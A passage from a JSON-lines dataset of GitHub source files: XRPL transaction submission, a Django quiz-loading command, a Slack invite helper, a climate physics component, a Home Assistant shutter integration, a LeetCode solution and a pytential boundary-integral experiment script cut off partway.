is_valid_point(member_p)\n members.append(member_p)\n \n unit = Unit(members, pivot_p, data[\"width\"])\n data[\"units\"].append(unit)\n\n\n return data\n \n \n","repo_name":"mj1618/icfp2015","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"895428652","text":"\"\"\"High-level reliable submission methods with XRPL transactions.\"\"\"\n\nimport asyncio\n\nfrom typing_extensions import Final\n\nfrom xrpl.asyncio.clients import Client\nfrom xrpl.asyncio.ledger import get_latest_validated_ledger_sequence\nfrom xrpl.asyncio.transaction.ledger import get_transaction_from_hash\nfrom xrpl.asyncio.transaction.main import submit_transaction\nfrom xrpl.constants import XRPLException\nfrom xrpl.models.response import Response\nfrom xrpl.models.transactions.transaction import Transaction\n\n_LEDGER_CLOSE_TIME: Final[int] = 4\n\n\nclass XRPLReliableSubmissionException(XRPLException):\n \"\"\"General XRPL Reliable Submission Exception.\"\"\"\n\n pass\n\n\nasync def _wait_for_final_transaction_outcome(\n transaction_hash: str, client: Client, prelim_result: str\n) -> Response:\n \"\"\"\n The core logic of reliable submission. Polls the ledger until the result of the\n transaction can be considered final, meaning it has either been included in a\n validated ledger, or the transaction's lastLedgerSequence has been surpassed by the\n latest ledger sequence (meaning it will never be included in a validated ledger).\n \"\"\"\n await asyncio.sleep(_LEDGER_CLOSE_TIME)\n # new persisted transaction\n\n # query transaction by hash\n transaction_response = await get_transaction_from_hash(transaction_hash, client)\n\n result = transaction_response.result\n if \"validated\" in result and result[\"validated\"]:\n # result is in a validated ledger, outcome is final\n return transaction_response\n\n last_ledger_sequence = result[\"LastLedgerSequence\"]\n latest_ledger_sequence = await get_latest_validated_ledger_sequence(client)\n\n if last_ledger_sequence > latest_ledger_sequence:\n # outcome is not yet final\n return await _wait_for_final_transaction_outcome(\n transaction_hash, client, prelim_result\n )\n\n raise XRPLReliableSubmissionException(\n f\"The latest ledger sequence {latest_ledger_sequence} is greater than the \"\n f\"last ledger sequence {last_ledger_sequence} in the transaction. Prelim \"\n f\"result: {prelim_result}\"\n )\n\n\nasync def send_reliable_submission(\n transaction: Transaction, client: Client\n) -> Response:\n \"\"\"\n Asynchronously submits a transaction and verifies that it has been included in a\n validated ledger (or has errored/will not be included for some reason).\n\n `See Reliable Transaction Submission\n `_\n\n Note: This cannot be used with a standalone rippled node, because ledgers do not\n close automatically.\n\n Args:\n transaction: the signed transaction to submit to the ledger. Requires a\n `last_ledger_sequence` param.\n client: the network client used to submit the transaction to a rippled node.\n\n Returns:\n The response from a validated ledger.\n\n Raises:\n XRPLReliableSubmissionException: if the transaction fails, is malformed, or is\n missing a `last_ledger_sequence` param.\n \"\"\"\n if transaction.last_ledger_sequence is None:\n raise XRPLReliableSubmissionException(\n \"Transaction must have a `last_ledger_sequence` param.\"\n )\n transaction_hash = transaction.get_hash()\n submit_response = await submit_transaction(transaction, client)\n prelim_result = submit_response.result[\"engine_result\"]\n if prelim_result[0:3] == \"tem\":\n raise XRPLReliableSubmissionException(\n submit_response.result[\"engine_result_message\"]\n )\n\n return await _wait_for_final_transaction_outcome(\n transaction_hash, client, prelim_result\n )\n","repo_name":"merlinepedra/XRPL-PYTHON-WALLET","sub_path":"xrpl/asyncio/transaction/reliable_submission.py","file_name":"reliable_submission.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"2252211022","text":"import numpy as np\n# import scipy\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport math\nimport sys\n\nim = Image.open(sys.argv[1])\nim_array = im.load()\nprint(im_array)\n\nwidth = 640\nheight = 448\nsegmented = np.zeros((4,4))\n\nfor h in range(height -1 ):\n for w in range(width -1):\n dif1 = np.linalg.norm(np.array(im_array[w,h]) - np.array([146,142,89]))\n dif2 = np.linalg.norm(np.array(im_array[w,h]) - np.array([151,149,122]))\n if min(dif1, dif2) < 5:\n segmented[math.floor(h/height*4), math.floor(w/width*4)] += 1\n # print(im_array[h, w, :])\nmax = segmented.max()\nsegmented = segmented == max\n\nim_plot = plt.imshow(segmented)\nplt.show(im_plot)\n","repo_name":"rhotter/AOUF","sub_path":"simple_detector.py","file_name":"simple_detector.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30601367821","text":"import json\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom user_tests.models import Test, Task, Question, AnswerOptions\n\n\nclass Command(BaseCommand):\n help = 'Creates list of questions for given task of given test.\\n'\\\n 'It takes six required arguments:\\n'\\\n '--choice_type - takes one of options to estimate questions \\n' \\\n '\\tunique - only one correct choice\\n' \\\n '\\tmultiple - many correct choices\\n' \\\n '\\tby_admin - question is to be estimate by admin\\n' \\\n '--file - takes full name of json file with task data\\n' \\\n '--test - takes test name\\n' \\\n '--time_available - takes available time to pass a test\\n' \\\n '--task - takes task name\\n' \\\n '--evaluation_algorithm - takes if task should be auto appraise'\n\n def add_arguments(self, parser):\n\n parser.add_argument(\n '--choice_type',\n action='store',\n dest='choice_type',\n help='Stores if task contains only one choice questions'\n )\n\n parser.add_argument(\n '--file',\n action='store',\n dest='file',\n help='Stores JSON file of given task'\n )\n\n parser.add_argument(\n '--test',\n action='store',\n dest='test',\n help='Stores test name'\n )\n\n parser.add_argument(\n '--time_available',\n action='store',\n dest='time_available',\n help='Stores available time (number of seconds) to pass test',\n type=int\n )\n\n parser.add_argument(\n '--task',\n action='store',\n dest='task',\n help='Stores task name'\n )\n\n parser.add_argument(\n '--evaluation_algorithm',\n required=False,\n action='store',\n dest='evaluation_algorithm',\n help='Stores if task should be auto appraise',\n type=bool\n )\n\n parser.set_defaults(evaluation_algorithm=Task.ALGORITHM_AUTO_APPRAISAL)\n\n def handle(self, *args, **options):\n\n choice_type = options['choice_type']\n file = options['file']\n test = options['test']\n time_available = options['time_available']\n task = options['task']\n evaluation_algorithm = options['evaluation_algorithm']\n\n json_data = open(file).read()\n json_data = json.loads(json_data)\n\n test_object, test_created = Test.objects.get_or_create(\n name=test, time_available=time_available\n )\n task_object, task_created = Task.objects.get_or_create(\n test=test_object, name=task,\n evaluation_algorithm=evaluation_algorithm\n )\n\n for item in json_data:\n\n title = item[\"title\"]\n question = Question.objects.create(text=title, task=task_object)\n\n if choice_type == 'unique':\n true_answers = [i[0] for i in item['choices'] if i[0]]\n if len(true_answers) > 1:\n raise CommandError(\n \"This question should contain only one correct \"\n \"choice\"\n )\n\n for is_correct, text in item[\"choices\"]:\n AnswerOptions.objects.create(\n question=question, text=text, is_correct=is_correct\n )\n","repo_name":"slonidet/volunteer","sub_path":"src/user_tests/management/commands/newtask.py","file_name":"newtask.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"69882648685","text":"import requests\n\nslack_headers = {'content-type': 'application/json'}\n\ndef _invite_user(token, email, headers):\n \"\"\"\n Invite new user to slack team\n :param token: The token of the slack app that will invite the user\n :param email: The email of the user that will be invited\n :param headers: The headers for the http request for slack\n :return: invite the user\n \"\"\"\n invite_user = requests.post(\n 'https://slack.com/api/users.admin.invite?token={0}&email={1}'.format(\n token, email),\n headers=headers)\n return invite_user\n\n\ndef main(token, email):\n \"\"\"\n Doing onboarding process for Slack user\n :param token: The token of the slack app that will invite the user\n :param email: The email of the user that will be invited\n :return:\n \"\"\"\n invite_user = _invite_user(token, email, slack_headers)\n return invite_user\n","repo_name":"yuvalman/gigaspaces-onboarding","sub_path":"slack_onboarding.py","file_name":"slack_onboarding.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71011751404","text":"from ..._core import ensure_contiguous_state\nfrom sympl import Stepper, get_constant\nimport logging\ntry:\n from . import _simple_physics as phys\nexcept ImportError as error:\n logging.warning(\n 'Import failed. Simple Physics is likely not compiled and will not be'\n 'available.'\n )\n print(error)\n\n\nclass SimplePhysics(Stepper):\n \"\"\"\n Interface to the simple physics package.\n\n Reed and Jablonowski 2012:\n title = {Idealized tropical cyclone simulations of intermediate complexity: a test case for {AGCMs}}\n journal = {Journal of Advances in Modeling Earth Systems}\n\n \"\"\"\n\n input_properties = {\n 'air_temperature': {\n 'dims': ['mid_levels', '*'],\n 'units': 'degK',\n },\n 'air_pressure': {\n 'dims': ['mid_levels', '*'],\n 'units': 'Pa',\n },\n 'air_pressure_on_interface_levels': {\n 'dims': ['interface_levels', '*'],\n 'units': 'Pa',\n },\n 'surface_air_pressure': {\n 'dims': ['*'],\n 'units': 'Pa',\n },\n 'surface_temperature': {\n 'dims': ['*'],\n 'units': 'degK',\n },\n 'specific_humidity': {\n 'dims': ['mid_levels', '*'],\n 'units': 'kg/kg',\n },\n 'northward_wind': {\n 'dims': ['mid_levels', '*'],\n 'units': 'm s^-1',\n },\n 'eastward_wind': {\n 'dims': ['mid_levels', '*'],\n 'units': 'm s^-1',\n },\n 'surface_specific_humidity': {\n 'dims': ['*'],\n 'units': 'kg/kg',\n },\n 'latitude': {\n 'dims': ['*'],\n 'units': 'degrees_north',\n }\n }\n\n diagnostic_properties = {\n 'stratiform_precipitation_rate': {\n 'dims': ['*'],\n 'units': 'm s^-1',\n },\n 'surface_upward_latent_heat_flux': {\n 'dims': ['*'],\n 'units': 'W m^-2',\n },\n 'surface_upward_sensible_heat_flux': {\n 'dims': ['*'],\n 'units': 'W m^-2',\n },\n }\n\n output_properties = {\n 'air_temperature': {'units': 'degK'},\n 'specific_humidity': {'units': 'kg/kg'},\n 'northward_wind': {'units': 'm s^-1'},\n 'eastward_wind': {'units': 'm s^-1'},\n }\n\n def __init__(\n self,\n simulate_cyclone=False,\n large_scale_condensation=True,\n boundary_layer=True,\n surface_fluxes=True,\n use_external_surface_temperature=True,\n use_external_surface_specific_humidity=False,\n top_of_boundary_layer=85000.0,\n boundary_layer_influence_height=20000.0,\n drag_coefficient_heat_fluxes=0.0011,\n base_momentum_drag_coefficient=0.0007,\n wind_dependent_momentum_drag_coefficient=0.000065,\n maximum_momentum_drag_coefficient=0.002,\n **kwargs):\n \"\"\"\n Args:\n\n simulate_cyclone (bool):\n Option indicating whether the package must\n simulate a tropical cyclone. This was the original test case this\n physics package was used for.\n Default value is False.\n\n large_scale_condensation (bool):\n Option indicating whether the package\n must add moisture and heating tendencies due to large scale condensation.\n Default value is True.\n\n boundary_layer (bool):\n Option indicating whether the package must simulate\n a simple boundary layer. **It is recommended that this option remain True\n unless another boundary layer component is being used**.\n Default value is True.\n\n surface_fluxes (bool):\n Option indicating whether the package must calculate\n surface fluxes. **It is recommended that this option remain True unless the\n fluxes are being calculated by another component**.\n Default value is True.\n\n use_external_surface_temperature (bool):\n Option indicating whether the package\n must use surface temperature available in the model state.\n If False, an internally generated surface temperature is used.\n Default value is True.\n\n top_of_boundary_layer (float):\n The nominal top of the boundary layer in :math:`Pa`.\n\n boundary_layer_influence_height (float):\n The decay of the influence of the boundary layer above\n :code:`top_of_boundary_layer` in :math:`Pa`. The influence\n reduces to :math:`1/e` times the boundary layer value at\n a pressure given by :code:`top_of_boundary_layer+boundary_layer_influence_height`.\n\n drag_coefficient_heat_fluxes (float):\n The wind speed independent drag coefficient for latent and sensible\n heat fluxes.\n\n base_momentum_drag_coefficient (float):\n The minimum drag coefficient for winds.\n\n wind_dependent_momentum_drag_coefficient (float):\n The part of the momentum drag coefficient that depends on the surface wind\n speed. The total drag coefficient is given by\n :code:`base_momentum_drag_coefficient + wind_dependent_momentum_drag_coefficient*u_base`,\n where :code:`u_base` is the surface wind speed.\n\n maximum_momentum_drag_coefficient (float):\n This drag coefficient is used for surface wind speeds exceeding :math:`20 m/s`.\n \"\"\"\n\n self._cyclone = simulate_cyclone\n self._lsc = large_scale_condensation\n self._pbl = boundary_layer\n self._surface_flux = surface_fluxes\n self._use_ext_ts = use_external_surface_temperature\n self._use_ext_qsurf = use_external_surface_specific_humidity\n\n phys.init_simple_physics(self._cyclone, self._lsc, self._pbl,\n self._surface_flux, self._use_ext_ts,\n self._use_ext_qsurf)\n\n self._Ct = drag_coefficient_heat_fluxes\n self._pbl_top = top_of_boundary_layer\n self._delta_pbl = boundary_layer_influence_height\n self._Cd0 = base_momentum_drag_coefficient\n self._Cd1 = wind_dependent_momentum_drag_coefficient\n self._Cm = maximum_momentum_drag_coefficient\n self._set_fortran_constants()\n super(SimplePhysics, self).__init__(**kwargs)\n\n def _set_fortran_constants(self):\n self._g = get_constant('gravitational_acceleration', 'm/s^2')\n self._Cpd = get_constant('heat_capacity_of_dry_air_at_constant_pressure', 'J/kg/degK')\n self._Rair = get_constant('gas_constant_of_dry_air', 'J/kg/degK')\n self._Rcond = get_constant('gas_constant_of_vapor_phase', 'J/kg/degK')\n self._radius = get_constant('planetary_radius', 'm')\n self._Omega = get_constant('planetary_rotation_rate', 's^-1')\n self._Lv = get_constant('latent_heat_of_condensation', 'J/kg')\n self._rho_condensible = get_constant('density_of_liquid_water', 'kg/m^3')\n phys.set_physical_constants(self._g, self._Cpd, self._Rair, self._Lv,\n self._Rcond, self._radius, self._Omega,\n self._rho_condensible, self._pbl_top,\n self._delta_pbl, self._Ct, self._Cd0,\n self._Cd1, self._Cm)\n\n @ensure_contiguous_state\n def array_call(self, state, timestep):\n '''\n Calculate surface and boundary layer tendencies.\n\n Args:\n state (dict):\n The model state dictionary\n\n timestep (timedelta):\n The model timestep\n\n Returns:\n state (dict), diagnostics(dict) :\n\n * The updated model state.\n * diagnostics for Simple Physics\n '''\n self._set_fortran_constants()\n (t_out, u_out, v_out, q_out, precip_out,\n sensible_heat_flux, latent_heat_flux) = phys.get_new_state(\n state['eastward_wind'],\n state['northward_wind'],\n state['air_temperature'],\n state['air_pressure'],\n state['air_pressure_on_interface_levels'],\n state['specific_humidity'],\n state['surface_air_pressure'],\n state['surface_temperature'],\n state['surface_specific_humidity'],\n state['latitude'],\n timestep.total_seconds()\n )\n latent_heat_flux[latent_heat_flux < 0] = 0\n new_state = {\n 'eastward_wind': u_out,\n 'northward_wind': v_out,\n 'air_temperature': t_out,\n 'specific_humidity': q_out,\n }\n diagnostics = {\n 'stratiform_precipitation_rate': precip_out,\n 'surface_upward_sensible_heat_flux': sensible_heat_flux,\n 'surface_upward_latent_heat_flux': latent_heat_flux,\n }\n return diagnostics, new_state\n","repo_name":"CliMT/climt","sub_path":"climt/_components/simple_physics/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"19"} +{"seq_id":"37577058","text":"from .somfy_rts import RTSSomfyRollingShutter\nimport voluptuous as vol\n\nfrom pprint import pformat\n\nimport logging\n\nimport homeassistant.helpers.config_validation as config_validation\nfrom homeassistant.components.cover import (\n CoverEntity,\n CoverDeviceClass,\n CoverEntityFeature,\n PLATFORM_SCHEMA,\n STATE_OPEN,\n STATE_CLOSED,\n)\n\nfrom homeassistant.const import CONF_NAME, CONF_IP_ADDRESS, CONF_PORT\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\n\n_LOGGER = logging.getLogger(\"somfy_rts\")\n\n# Validation of the user's configuration\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Required(CONF_NAME): config_validation.string,\n vol.Required(CONF_IP_ADDRESS): config_validation.string,\n vol.Required(CONF_PORT): config_validation.string,\n }\n)\n\n\ndef setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None\n) -> None:\n \"\"\"Set up Somfy RTS rolling shutter.\"\"\"\n _LOGGER.info(pformat(config))\n\n cover = {\n \"name\": config[CONF_NAME],\n \"ip_address\": config[CONF_IP_ADDRESS],\n \"port\": config[CONF_PORT]\n }\n\n add_entities([SomfyRTSCover(cover)])\n\n\nclass SomfyRTSCover(CoverEntity):\n \"\"\"Representation of a Somfy RTS rolling shutter.\"\"\"\n\n def __init__(self, cover):\n \"\"\"Initialize a Somfy RTS rolling shutter.\"\"\"\n _LOGGER.info(pformat(cover))\n self._name = cover.get('name')\n self._ip_address = cover.get('ip_address')\n self._port = cover.get('port')\n self._cover = RTSSomfyRollingShutter(\n self._ip_address,\n self._port,\n self._name\n )\n self._attr_device_class = CoverDeviceClass.SHUTTER\n self._attr_supported_features = (\n CoverEntityFeature.OPEN |\n CoverEntityFeature.CLOSE |\n CoverEntityFeature.STOP\n )\n self._state = None\n\n def open_cover(self, **kwargs):\n \"\"\"Open the rolling shutter.\"\"\"\n self._cover.up()\n self._state = STATE_OPEN\n\n def close_cover(self, **kwargs):\n \"\"\"Close the rolling shutter.\"\"\"\n self._cover.down()\n self._state = STATE_CLOSED\n\n def stop_cover(self, **kwargs):\n \"\"\"Stop the rolling shutter.\"\"\"\n self._cover.stop()\n self._state = None\n\n @property\n def is_closed(self):\n return self._state is not STATE_OPEN\n\n @property\n def name(self):\n return self._name\n","repo_name":"Vincent-Stragier/rts_covers","sub_path":"homeassistant_custom_component/somfy_rts/cover.py","file_name":"cover.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43516488217","text":"from typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def hasPathSum(self, root: Optional[TreeNode], targetSum: int) -> bool:\n cnt = 0\n mas = []\n\n def helper(tree, cnt, mas):\n if tree:\n cnt += tree.val\n\n if tree.left:\n helper(tree.left, cnt, mas)\n if tree.right:\n helper(tree.right, cnt, mas)\n if not tree.left and not tree.right:\n mas.append(cnt)\n\n helper(root, cnt, mas)\n return True if targetSum in mas else False\n\n\nt = TreeNode(val=1, left=TreeNode(val=2, left=TreeNode(val=1)), right=TreeNode(val=4))\ntarget = 5\nresult = Solution().hasPathSum(t, target)\nprint(result)\n","repo_name":"nazarovlex/leetcode","sub_path":"Easy/112. Path Sum.py","file_name":"112. Path Sum.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"339499973","text":"#!/usr/bin/env python3\n\"\"\"Gather experimental data\"\"\"\nimport numpy as np # noqa\nimport numpy.linalg as la # noqa\nimport pyopencl as cl # noqa\nimport pyopencl.clmath # noqa\nimport json\nimport utils\nimport os\nimport gzip\nimport pickle\n\nfrom functools import partial # noqa: F401\nfrom meshmode.mesh.generation import ( # noqa\n ellipse, cloverleaf, NArmedStarfish, drop, n_gon, qbx_peanut,\n WobblyCircle, make_curve_mesh, starfish)\nfrom pytential import bind, sym, norm # noqa\nfrom pytential.qbx.performance import PerformanceModel\nfrom pytools import one\n\n\nimport logging\nimport multiprocessing\n\nlogging.basicConfig(level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\nTARGET_ORDER = 8\nOVSMP_FACTOR = 5\nTCF = 0.9\nQBX_ORDER = 5\nFMM_ORDER = 15\nMESH_TOL = 1e-10\nFORCE_STAGE2_UNIFORM_REFINEMENT_ROUNDS = 1\nSCALED_MAX_CURVATURE_THRESHOLD = 0.8\nMAX_LEAF_REFINE_WEIGHT = 128\nRUNS = 1\nPOOL_WORKERS = min(5, 1 + multiprocessing.cpu_count())\n\nURCHIN_PARAMS = list(range(2, 12, 2))\nTUNING_URCHIN = 6\n# URCHIN_PARAMS = list(range(2, 7, 2))\nDONUT_PARAMS = list(range(1, 6))\n\n\nDEFAULT_LPOT_KWARGS = dict(\n fmm_backend=\"fmmlib\",\n target_association_tolerance=1e-3,\n fmm_order=FMM_ORDER, qbx_order=QBX_ORDER,\n _box_extent_norm=\"l2\",\n _from_sep_smaller_crit=\"static_l2\",\n _well_sep_is_n_away=2,\n _expansions_in_tree_have_extent=True,\n _expansion_stick_out_factor=TCF,\n _max_leaf_refine_weight=MAX_LEAF_REFINE_WEIGHT,\n _from_sep_smaller_min_nsources_cumul=0,\n _use_target_specific_qbx=False,\n performance_model=PerformanceModel(),\n )\n\n\n# {{{ general utils\n\nclass GeometryGetter(object):\n\n def __init__(self, getter, label):\n self.getter = getter\n self.label = label\n\n def __call__(self, queue, lpot_kwargs):\n return self.getter(queue, lpot_kwargs)\n\n\ndef lpot_source_from_mesh(queue, mesh, lpot_kwargs=None):\n from meshmode.discretization import Discretization\n from meshmode.discretization.poly_element import (\n InterpolatoryQuadratureSimplexGroupFactory)\n\n target_order = TARGET_ORDER\n\n pre_density_discr = Discretization(\n queue.context, mesh,\n InterpolatoryQuadratureSimplexGroupFactory(target_order))\n\n refiner_extra_kwargs = {\n \"_force_stage2_uniform_refinement_rounds\": (\n FORCE_STAGE2_UNIFORM_REFINEMENT_ROUNDS),\n \"_scaled_max_curvature_threshold\": (\n SCALED_MAX_CURVATURE_THRESHOLD),\n }\n\n if lpot_kwargs is None:\n lpot_kwargs = DEFAULT_LPOT_KWARGS\n\n from pytential.qbx import QBXLayerPotentialSource\n lpot_source = QBXLayerPotentialSource(\n pre_density_discr, OVSMP_FACTOR*target_order,\n **lpot_kwargs,)\n\n lpot_source, _ = lpot_source.with_refinement(**refiner_extra_kwargs)\n\n return lpot_source\n\n\ndef _urchin_lpot_source(k, queue, lpot_kwargs):\n sph_m = k // 2\n sph_n = k\n\n from meshmode.mesh.generation import generate_urchin\n mesh = generate_urchin(\n order=TARGET_ORDER, m=sph_m, n=sph_n,\n est_rel_interp_tolerance=MESH_TOL)\n\n return lpot_source_from_mesh(queue, mesh, lpot_kwargs)\n\n\ndef urchin_geometry_getter(k, label=None):\n if label is None:\n label = k\n\n return GeometryGetter(partial(_urchin_lpot_source, k), label)\n\n\ndef replicate_along_axes(mesh, shape, sep_ratio):\n from meshmode.mesh.processing import (\n find_bounding_box, affine_map, merge_disjoint_meshes)\n\n bbox = find_bounding_box(mesh)\n sizes = bbox[1] - bbox[0]\n\n meshes = [mesh]\n\n for i in range(mesh.ambient_dim):\n for j in range(1, shape[i]):\n vec = np.zeros(mesh.ambient_dim)\n vec[i] = j * sizes[i] * (1 + sep_ratio)\n meshes.append(affine_map(mesh, A=None, b=vec))\n\n # FIXME: https://gitlab.tiker.net/inducer/pytential/issues/6\n mesh = merge_disjoint_meshes(meshes, single_group=True)\n meshes = [mesh]\n\n return mesh\n\n\ndef _torus_lpot_source(r_outer, r_inner, n_outer, n_inner, replicant_shape,\n sep_ratio, queue, lpot_kwargs):\n from meshmode.mesh.generation import generate_torus\n mesh = generate_torus(\n r_outer, r_inner,\n n_outer, n_inner,\n order=TARGET_ORDER)\n mesh = replicate_along_axes(mesh, replicant_shape, sep_ratio)\n return lpot_source_from_mesh(queue, mesh, lpot_kwargs)\n\n\ndef torus_geometry_getter(r_outer, r_inner, n_outer, n_inner, label):\n if label is None:\n label = (r_outer, r_inner, n_outer, n_inner)\n\n return GeometryGetter(\n partial(\n _torus_lpot_source,\n r_outer, r_inner,\n n_outer, n_inner,\n (1, 1, 1), 0),\n label)\n\n\ndef donut_geometry_getter(nrows, label=None):\n if label is None:\n label = nrows\n\n getter = partial(_torus_lpot_source, 2, 1, 40, 20, (2, nrows, 1), 0.1)\n return GeometryGetter(getter, label)\n\n\ndef plane_geometry_getter(label=\"plane\"):\n from inteq_tests import plane_lpot_source\n return GeometryGetter(plane_lpot_source, label)\n\n\nPARAMS_DIR = \"params\"\nOUTPUT_DIR = \"raw-data\"\nBVP_OUTPUT_DIR = \"raw-data-bvp\"\n\n\ndef make_output_file(filename, **flags):\n os.makedirs(OUTPUT_DIR, exist_ok=True)\n return open(os.path.join(OUTPUT_DIR, filename), \"w\", **flags)\n\n\ndef make_params_file(filename, **flags):\n os.makedirs(PARAMS_DIR, exist_ok=True)\n return open(os.path.join(PARAMS_DIR, filename), \"w\", **flags)\n\n\ndef load_params(filename, **flags):\n with open(os.path.join(PARAMS_DIR, filename), \"r\", **flags) as outf:\n return json.load(outf, cls=utils.CostResultDecoder)\n\n\ndef output_data(obj, outfile):\n json.dump(obj, outfile, cls=utils.CostResultEncoder, indent=1)\n if hasattr(outfile, \"name\"):\n logger.info(\"Wrote '%s'\", outfile.name)\n\n# }}}\n\n\n# {{{ cost getter\n\ndef get_lpot_cost(which, helmholtz_k, geometry_getter, lpot_kwargs, kind):\n \"\"\"\n Parameters:\n\n which: \"D\" or \"S\"\n kind: \"actual\" or \"model\"\n \"\"\"\n context = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(context)\n\n lpot_source = geometry_getter(queue, lpot_kwargs)\n\n from sumpy.kernel import LaplaceKernel, HelmholtzKernel\n sigma_sym = sym.var(\"sigma\")\n if helmholtz_k == 0:\n k_sym = LaplaceKernel(lpot_source.ambient_dim)\n kernel_kwargs = {}\n else:\n k_sym = HelmholtzKernel(lpot_source.ambient_dim, \"k\")\n kernel_kwargs = {\"k\": helmholtz_k}\n\n if which == \"S\":\n op = sym.S(k_sym, sigma_sym, qbx_forced_limit=+1, **kernel_kwargs)\n elif which == \"D\":\n op = sym.D(k_sym, sigma_sym, qbx_forced_limit=\"avg\", **kernel_kwargs)\n else:\n raise ValueError(\"unknown lpot symbol: '%s'\" % which)\n\n bound_op = bind(lpot_source, op)\n\n density_discr = lpot_source.density_discr\n nodes = density_discr.nodes().with_queue(queue)\n sigma = cl.clmath.sin(10 * nodes[0])\n\n if kind == \"actual\":\n timing_data = {}\n result = bound_op.eval(\n queue, {\"sigma\": sigma}, timing_data=timing_data)\n assert not np.isnan(result.get(queue)).any()\n result = one(timing_data.values())\n\n elif kind == \"model\":\n perf_results = bound_op.get_modeled_performance(queue, sigma=sigma)\n result = one(perf_results.values())\n\n return result\n\n# }}}\n\n\n# {{{ green error getter\n\ndef get_green_error(geometry_getter, lpot_kwargs, center, k,\n vis_error_filename=None, vis_order=TARGET_ORDER):\n \"\"\"Return the Green identity error for a geometry.\n\n The density function for the Green error is the on-surface restriction of\n the potential due to a source charge in the exterior of the geometry, whose\n location is specified. The error is reported relative to the norm of the\n density.\n\n Params:\n\n geometry_getter: Geometry getter\n lpot_kwargs: Constructor args to QBXLayerPotentialSource\n center: Center of source charge used to obtain the constructed density\n k: Helmholtz parameter\n\n Returns:\n\n A dictionary containing Green identity errors in l^2 and l^infty norm\n \"\"\"\n context = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(context)\n lpot_source = geometry_getter(queue, lpot_kwargs)\n\n d = lpot_source.ambient_dim\n\n u_sym = sym.var(\"u\")\n dn_u_sym = sym.var(\"dn_u\")\n\n from sumpy.kernel import LaplaceKernel, HelmholtzKernel\n lap_k_sym = LaplaceKernel(d)\n if k == 0:\n k_sym = lap_k_sym\n knl_kwargs = {}\n else:\n k_sym = HelmholtzKernel(d)\n knl_kwargs = {\"k\": sym.var(\"k\")}\n\n S_part = (\n sym.S(k_sym, dn_u_sym, qbx_forced_limit=-1, **knl_kwargs))\n\n D_part = (\n sym.D(k_sym, u_sym, qbx_forced_limit=\"avg\", **knl_kwargs))\n\n sym_op = S_part - D_part - 0.5 * u_sym\n\n density_discr = lpot_source.density_discr\n\n # {{{ compute values of a solution to the PDE\n\n nodes_host = density_discr.nodes().get(queue)\n normal = bind(density_discr, sym.normal(d))(queue).as_vector(np.object)\n normal_host = [normal[j].get() for j in range(d)]\n\n if k != 0:\n if d == 2:\n angle = 0.3\n wave_vec = np.array([np.cos(angle), np.sin(angle)])\n u = np.exp(1j*k*np.tensordot(wave_vec, nodes_host, axes=1))\n grad_u = 1j*k*wave_vec[:, np.newaxis]*u\n else:\n diff = nodes_host - center[:, np.newaxis]\n r = la.norm(diff, axis=0)\n u = np.exp(1j*k*r) / r\n grad_u = diff * (1j*k*u/r - u/r**2)\n else:\n diff = nodes_host - center[:, np.newaxis]\n dist_squared = np.sum(diff**2, axis=0)\n dist = np.sqrt(dist_squared)\n if d == 2:\n u = np.log(dist)\n grad_u = diff/dist_squared\n elif d == 3:\n u = 1/dist\n grad_u = -diff/dist**3\n else:\n assert False\n\n dn_u = 0\n for i in range(d):\n dn_u = dn_u + normal_host[i]*grad_u[i]\n\n # }}}\n\n u_dev = cl.array.to_device(queue, u)\n dn_u_dev = cl.array.to_device(queue, dn_u)\n grad_u_dev = cl.array.to_device(queue, grad_u)\n\n bound_op = bind(lpot_source, sym_op)\n error = bound_op(queue, u=u_dev, dn_u=dn_u_dev, grad_u=grad_u_dev, k=k)\n\n scaling_l2 = 1 / norm(density_discr, queue, u_dev, p=2)\n scaling_linf = 1 / norm(density_discr, queue, u_dev, p=\"inf\")\n\n if vis_error_filename is not None:\n from meshmode.discretization.visualization import make_visualizer\n bdry_vis = make_visualizer(queue, lpot_source.density_discr, vis_order)\n bdry_vis.write_vtk_file(vis_error_filename, [\n (\"green_zero\", error),\n (\"u_dev\", u_dev),\n ])\n\n err_l2 = scaling_l2 * norm(density_discr, queue, error, p=2)\n err_linf = scaling_linf * norm(density_discr, queue, error, p=\"inf\")\n\n return dict(err_l2=err_l2, err_linf=err_linf)\n\n# }}}\n\n\n# {{{ parameter study - vary parameter with constant geometry\n\ndef run_parameter_study(\n param_name, param_values, geometry_getter,\n lpot_kwargs, which_op, helmholtz_k):\n \"\"\"Run the cost model over a geometry, varying a single parameter value.\n\n Params:\n\n param_name: Parameter name (a constructor arg\n to QBXLayerPotentialSource)\n param_values: Range of values to check\n geometry_getter: Geometry getter\n lpot_kwargs: Baseline constructor 